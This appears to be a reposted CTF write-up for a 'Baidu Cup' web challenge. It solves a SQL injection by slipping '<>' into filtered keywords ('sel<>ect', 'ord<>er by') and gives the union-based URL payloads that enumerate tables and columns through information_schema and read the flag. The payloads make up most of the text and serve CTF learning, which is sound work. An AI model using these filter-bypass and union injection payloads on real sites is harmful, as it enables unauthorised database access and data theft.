当前位置:网站首页>"Baidu Cup" CTF competition in September, web:sql

"Baidu Cup" CTF competition in September, web:sql

2022-07-05 13:12:00 Part 02

Topic content :

The author will tell you that this is an injection , Don't leave if you feel like it !

see URL 

/index.php?id=1

Test filtration

No filtering :                                 ' Space #

Filtered :                                     order by,select

Test whether you can bypass

/**/

1 ord/**/er by 3%23

<>

1 ord<>er by 3%23                 With echo

1 ord<>er by 4%23                No echo

?id=-1 union sel<>ect 1,2,3%23

?id=-1 union sel<>ect 1,database(),3%23 

?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()%23

?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_schema=database()%23

?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info%23

原网站

版权声明
本文为[Part 02]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/186/202207051300268302.html

边栏推荐

猜你喜欢

随机推荐